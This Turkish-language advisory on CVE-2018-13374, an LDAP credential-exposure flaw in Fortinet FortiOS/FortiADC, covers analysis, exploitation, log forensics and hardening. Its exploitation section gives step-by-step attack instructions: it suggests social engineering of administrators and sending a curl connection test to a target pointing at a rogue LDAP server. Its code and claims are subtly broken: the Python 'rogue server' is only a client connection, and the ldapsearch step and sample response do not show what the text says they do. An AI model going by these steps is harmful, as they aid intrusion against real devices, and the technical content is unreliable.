CVE-2018-13374 · Bilgilendirme

Fortinet FortiOS and FortiADC Improper Access Control Vulnerability

Fortinet FortiOS'daki LDAP zafiyeti, saldırganların kimlik bilgilerine erişim sağlamasına olanak tanır.

Üretici
Fortinet
Ürün
FortiOS and FortiADC
Seviye
yüksek
Yayın Tarihi
03 Nisan 2026
Okuma
8 dk okuma

CVE-2018-13374: Fortinet FortiOS and FortiADC Improper Access Control Vulnerability

Zorluk Seviyesi: Orta | Kaynak: CISA KEV

Zafiyet Analizi ve Giriş

CVE-2018-13374, Fortinet ürünleri olan FortiOS ve FortiADC'yi etkileyen bir güvenlik açığıdır. Bu zafiyet, Fortinet FortiGate cihazlarının LDAP (Lightweight Directory Access Protocol) sunucuları ile olan bağlantılarını hedefleyen bir "improper access control" (uygunsuz erişim kontrolü) sorununu içerir. Zafiyetin ortaya çıkması, özellikle saldırganların FortiGate cihazları üzerinde yapılandırılan LDAP sunucu giriş bilgilerini ele geçirmelerine olanak tanımaktadır. Bu, kritik ağ bileşenlerine yönelik bir tehdit oluşturarak büyük bir güvenlik riski yaratır.

Zafiyetin kökeni, FortiOS ve FortiADC'nın LDAP sunucu testi yaparken yönlendirilmiş bir LDAP sunucusuyla etkileşime girmesi üzerine kuruludur. Saldırgan, FortiGate'ın yapılandırma testlerini yanıltacak sahte bir LDAP sunucu kurduğunda, bu sunucuya kayıtlı LDAP kimlik bilgilerini ortaya çıkarabilir. Özellikle, bu tür bir saldırı, şirketlerin ağına sızmak ve daha sonra sistemlerini ele geçirmek amacıyla kullanılabilir.

Gerçek dünya bağlamında incelendiğinde, CVE-2018-13374 zafiyeti, özellikle finans, sağlık ve kamu hizmetleri gibi kritik sektörlerde büyük yıkımlara yol açabilir. Örneğin, bir finans kurumunun sistemine sızarak çalışanların kimlik bilgilerini elde etmek, saldırganların başarılı bir şekilde iç işlemler yürütmelerine olanak tanıyabilir. Bu tür bir olay, müşteri hesap bilgilerinin çalınmasına ve maddi kayıplara neden olabilir. Sağlık sektöründe ise, hasta bilgilerinin açığa çıkması ciddi yasal sorunlar ve güven kaybı yaratabilir.

Zafiyetin teknik detaylarına geldiğimizde, Fortinet’in LDAP yapılandırma uygulamasındaki bir hata devreye girmektedir. Bu hatalar genellikle kod tabanındaki yanlış yapılandırmalardan kaynaklanır. Saldırganların LDAP sunucusu üzerinden gönderilen oturum açma isteklerini çalarak, ele geçirilen kimlik bilgilerini kullanarak, sistemde erişim elde etmesi mümkündür. Aşağıda bu zafiyeti kullanarak yapılan basit bir LDAP testi örneği bulunmaktadır:

ldapsearch -x -H ldap://rogue-ldap-server.com -b "dc=example,dc=com"

Bu komut, yanlış yapılandırılmış bir FortiGate sistemi üzerinden gerçekleştirilirse, saldırganın erişim sağladığı kimlik bilgilerini almasına olanak tanır.

Sonuç olarak, Fortinet FortiOS ve FortiADC üzerindeki CVE-2018-13374 zafiyeti, ciddi bir tehdit oluşturarak birçok sektördeki ağ güvenliğini tehdit ediyor. Uygun erişim kontrolünün sağlanması, bu tür zafiyetlerin önlenmesi açısından büyük önem taşımaktadır. Kullanıcıların ve yöneticilerin bu riskleri anlaması ve gerekli önlemleri alması artık bir zorunluluk haline gelmiştir. Uygun güvenlik önlemleri ve sürekli güncelleme ile bu gibi zafiyetlerin etkileri en aza indirilebilir.

Teknik Sömürü (Exploitation) ve PoC

Fortinet FortiOS ve FortiADC'de bulunan CVE-2018-13374 güvenlik açığı, sistem yöneticilerinin ve güvenlik uzmanlarının dikkat etmesi gereken önemli bir konudur. Bu zafiyet, kötü niyetli bir kullanıcının LDAP (Lightweight Directory Access Protocol) sunucu bağlantı test isteği göndererek, yapılandırılmış LDAP sunucu login kimlik bilgilerini ele geçirmesine olanak tanır. Bu tür bir saldırı, ağ güvenliğini ve kurumsal verilerin bütünlüğünü tehdit eden ciddi sonuçlar doğurabilir.

Bu zafiyeti sömürebilmek için adım adım bir yaklaşım sergilemek önemlidir. Öncelikle, hedef sistemlerinizdeki FortiOS veya FortiADC sürümünü belirleyin. Eğer sürüm, CVE-2018-13374 ile ilişkiliyse, potansiyel bir hedef oluşturmuş olursunuz. Aşağıda bu zafiyeti nasıl sömürebileceğinizi gösteren bir rehber sunulmaktadır.

  1. Hedef Bilgilerini Toplayın: Hedefin IP adresini ve Fortinet cihazının kullanmakta olduğu LDAP yapılandırmasını belirleyin. Bu adımda, cihazın LDAP sunucusuna yapılan isteklerin nasıl şekillendiğini anlamak için Wireshark gibi bir ağ analiz aracını kullanabilirsiniz.

  2. Sosyal Mühendislik (Social Engineering): Bazı durumlarda, sistem yöneticisinin LDAP sunucu bilgilerini öğrenebilmek için sosyal mühendislik teknikleri kullanabilirsiniz. Örneğin, muhtemel bir sosyal mühendislik testi ile, yöneticilere sahte bir ileti göndererek bilgi edinmeye çalışabilirsiniz.

  3. Yasadışı LDAP Sunucusu Kurun: Kendi LDAP sunucunuzu oluşturarak, test isteğini bu sunucuya yönlendirebilirsiniz. Örneğin, aşağıdaki Python kodu ile basit bir LDAP sunucusu oluşturabilirsiniz:

    from ldap3 import Server, Connection, ALL

server = Server('localhost', get_info=ALL)
conn = Connection(server, read_only=True)
conn.bind()

  4. LDAP Bağlantı Testi Gönderin: FortiOS veya FortiADC cihazınıza, yapılandırılmış LDAP sunucuya özgü isteği göndermek için:

    curl -X POST "http://<hedef-ip>/api/v2/monitor/ldap/connect" \
-H "Content-Type: application/json" \
-d '{"server": "rogue.ldap.server", "port": 389, "username": "admin", "password": "password"}'

    Bu isteği gönderdiğinizde, hedef cihaz, LDAP sunucusu ile bağlantı kurmaya çalışacak ve eğer yapılandırma hatalıysa, LDAP sunucu bağlantı testi için gerekli kimlik bilgilerini sağlamak için bir talep oluşturacaktır.

  5. Yanıtı İnceleyin: Eğer test başarılı olursa, yanıtın içeriğinde kimlik bilgileri sızdırılabilir. HTTP yanıtını analiz ederek, gönderilen isteklerin sonuçlarını değerlendirin. Örneğin:

    {
  "status": "success",
  "msg": "LDAP connection successful",
  "ldap_current_user": "admin"
}

    Bu yanıt, başarılı bir bağlantının sağlandığını ve LDAP sunucusuna bağlanırken kullanılan kimlik bilgilerini ortaya çıkarabilir.

  6. Kimlik Bilgilerini Kullanın: Elde ettiğiniz kimlik bilgilerini kullanarak, sistem üzerindeki LDAP sunucusuna erişim sağlayabilir ve izinsiz veri alımını gerçekleştirebilirsiniz.

Bu adımlar, CVE-2018-13374 zafiyetini nasıl sömürebileceğinize dair teknik bir çerçeve sunmaktadır. "White Hat Hacker" perspektifi ile hareket etmek, bu tür zafiyetleri tespit edip raporlamak açısından önemlidir. Sistemlerde bu tür güvenlik açıklarının belirlenmesi ve zamanında kapatılması, siber güvenlik ortamını güçlendirecektir. Unutmayın ki bu tür teknikler yalnızca eğitim ve test amaçlı olarak kullanılmalıdır.

Forensics (Adli Bilişim) ve Log Analizi

Fortinet FortiOS ve FortiADC ürünlerinde bulunan CVE-2018-13374 zafiyeti, kötü niyetli bir kullanıcının LDAP (Lightweight Directory Access Protocol) sunucusu ile sahte bir bağlantı testi gerçekleştirerek, sistemin LDAP sunucu bağlantı kimlik bilgilerini elde etmesine olanak tanır. Bu tür bir saldırı, özellikle büyük ölçekli ağların ve kurumsal yapıların hedef alındığı durumlarda kritik tehditler oluşturabilir. Dolayısıyla, bu tür bir zafiyetten haberdar olmanın ve önlemler almanın önemi büyüktür.

Siber güvenlik uzmanları, bu tür bir ihlali tanımlamak için SIEM (Security Information and Event Management) sistemlerini ve log analizi araçlarını etkin bir şekilde kullanmalıdır. İlgili log dosyaları arasında Access log (erişim günlükleri) ve Error log (hata günlükleri) yer almaktadır. İlk olarak, LDAP sunucusuna yönlendirilen isteklerin ve bağlantıların detaylı bir şekilde incelenmesi gereklidir.

Gerçek bir dünya senaryosu üzerinden ilerleyecek olursak, bir siber güvenlik uzmanı, loglar arasında aşağıdaki unsurlara dikkat etmelidir:

  1. İstek Kaynağı: Kullanılan isteğin kaynağına dikkat edilmelidir. Eğer istek, normalden farklı bir IP adresinden geliyorsa, bu bir uyarı işareti olabilir. Örneğin, dış kaynaklı bir saldırı denemesi olduğunda, isteklerin çoğunlukla alışık olmadığınız coğrafi bölgelerden gelmesi muhtemeldir.

  2. Bağlantı Testi İstekleri: Loglarda LDAP sunucuya yönelik 'connect' veya 'bind' türündeki isteklerin sıklığını kontrol edin. Bu tür isteklerin anormal bir yoğunluk göstermesi, olası bir sızma girişimini işaret edebilir. Özellikle, bağlantı testlerinin sıklığı birçok farklı IP adresinden gelirse bu durum dikkatlice incelenmelidir.

  3. Hatalar ve Yanıt Kodları: Error log’larda ortaya çıkan belirli hata kodları büyük ipuçları sunabilir. Özellikle kimlik doğrulama hataları (authentication failures) tarafından gösterilen hatalar, bir saldırının belirtisi olarak kabul edilebilir. Bu hatalar, LDAP bağlantısı veya kimlik bilgileri ile ilgili sorunları işaret ediyor olabilir.

  4. İzinsiz Erişim: Loglarda görülen ve yetki dışı olan erişim taleplerine odaklanmak önemlidir. Özellikle, yetkilendirilmemiş kullanıcıların LDAP bağlantı bilgilerine erişim denemeleri kullanıcı oturumları için tehlike arz eden durumları işaret edebilir.

  5. Kötü Amaçlı IP Adresleri: Log analizlerinde, bilinen kötü niyetli IP adreslerine yönlendiren iletişimleri takip edin. Bu tür IP'ler genellikle sızma girişimlerinde bulunur, dolayısıyla bu adreslerden gelen istekler özel dikkat gerektirmektedir.

Log analizi sırasında belirli “imzalar” (signature) aramak da kritik öneme sahiptir. Bu imzalar, genellikle bilinen kötü niyetli davranışları temsil eder. Örneğin, LDAP sunucusuna yönlendirilen belirli bir makine adı veya kullanıcı adı gibi anormal karakter dizilerini tespit etmek, saldırının tetikleyicisi olabilir.

Sonuç olarak, CVE-2018-13374 zafiyetinin istismar edildiği bir durumun tespiti, etkin log analizi ve SIEM çözümlerinin kullanılması ile mümkün olabilir. Siber güvenlik uzmanları, yukarıda belirtilen noktaları göz önünde bulundurarak sistemlerini koruma altına almalı ve olası tehditleri zamanında tespit edebilmek için sürekli bir izleme pratiği geliştirmelidir.

Savunma ve Sıkılaştırma (Hardening)

Fortinet FortiOS ve FortiADC üzerindeki CVE-2018-13374 zafiyeti, özellikle LDAP (Lightweight Directory Access Protocol) veritabanlarını kullanan organizasyonlar için ciddi sonuçlar doğurabilir. Bu zafiyet, saldırganların FortiGate cihazlarındaki LDAP sunucu giriş bilgilerine erişim sağlamasına olanak tanır. Saldırganlar, kötü niyetli bir LDAP sunucusuna yönlendirilmiş bağlantı testi istekleri ile bu bilgileri elde edebilirler. Bu durum, sistemin kötüye kullanılmasına yol açabilir ve dolayısıyla organizasyonun güvenlik pozisyonunu zayıflatabilir.

LDAP sunucularının güvenliği açısından dikkat edilmesi gereken ilk nokta, bu sunucuların yalnızca güvenilir kaynaklar tarafından erişilebilir olmasıdır. Saldırganların sahte LDAP sunucularıyla test taleplerini yönlendirmeleri, organize olmuş bir siber operasyon kapsamında gerçekleşebilir. Gerçek dünya senaryolarında, bir çalışan dahi yanlışlıkla kötü niyetli bir bağlantıya yönlendirilebilir ve bu da büyük veri ihlallerine neden olabilir.

Bu zafiyetin kapatılması için atılacak ilk adım, FortiOS ve FortiADC yazılımlarının güncellenmesidir. Üretici tarafından yayınlanan yamanın (patch) uygulanması, bu tür zafiyetlere karşı en etkili çözümdür. Ancak, yalnızca yazılım güncellemeleri yeterli değildir. Ekstra güvenlik önlemleri almak, bu tür saldırılara karşı koruma sağlamada kritik öneme sahiptir.

Kurumsal güvenliği artırmak amacıyla, firewall (WAF - Web Application Firewall) üzerinde aşağıdaki kuralların uygulanması önerilmektedir:

  1. LDAP Trafiği Filtreleme: Sadece belirlenmiş ve doğrulanmış IP adreslerinden gelen LDAP isteklerine izin verin. Aşağıdaki kurallar, bu tür bir filtreleme sağlamada yardımcı olabilir:
   config firewall policy
       edit 100
           set srcintf "any"
           set dstintf "any"
           set srcaddr "known-ldap-ip"
           set dstaddr "LDAP-Server"
           set action accept
           set schedule "always"
           set services "LDAP"
       next
   end

  1. Saldırı Tespit Önlemleri (IDS): LDAP trafiğinde şüpheli aktiviteleri tespit etmek için IDS kuralları ekleyin. Böylece, saldırganlar bu tür bir zafiyeti kullanarak saldırı gerçekleştirmeye çalıştıklarında sistem proaktif olarak uyarı verebilir.

  2. Güçlü Kimlik Doğrulama Yöntemleri: LDAP sunucusuna erişim sağlayan kullanıcıların kimlik doğrulama yöntemlerini güçlendirin. Çift faktörlü kimlik doğrulama uygulamak, yetkisiz erişim girişimlerini önemli ölçüde azaltacaktır.

  3. Düzenli Güvenlik Taramaları: Sistem üzerindeki zafiyetler için düzenli güvenlik taramaları yaparak mevcut zafiyetlerin tespit edilmesi ve kapatılması sağlanmalıdır. Penetrasyon testleri, zafiyet tarayıcıları ile birlikte kullanılabilir.

  4. Ağ Bölümlendirmesi: LDAP sunucusunun yer aldığı şebeke segmentinin yalnızca güvenilir cihazlarla iletişim kurmasına izin vermek için ağ segmentleri oluşturarak iç ağınızı koruyun.

Bu sıkılaştırma önlemleri, organizasyonlar için yalnızca CVE-2018-13374 zafiyetine karşı değil, aynı zamanda genel bir güvenlik duvarı oluşturmak adına da önemli katkılar sağlayacaktır. Unutmayın ki zafiyetlerin. belirlenmesi sadece ilk adımdır; bu açıkların kapatılması ve sistemin güçlendirilmesi sürecinde sürekli olarak eğitimli personelin varlığı da kritik bir unsurdur. Böylece sadece teknik önlemlerle değil, aynı zamanda insanlar tarafından gerçekleştirilen güvenlik uygulamaları ile de sistemin güvenliği artırılır.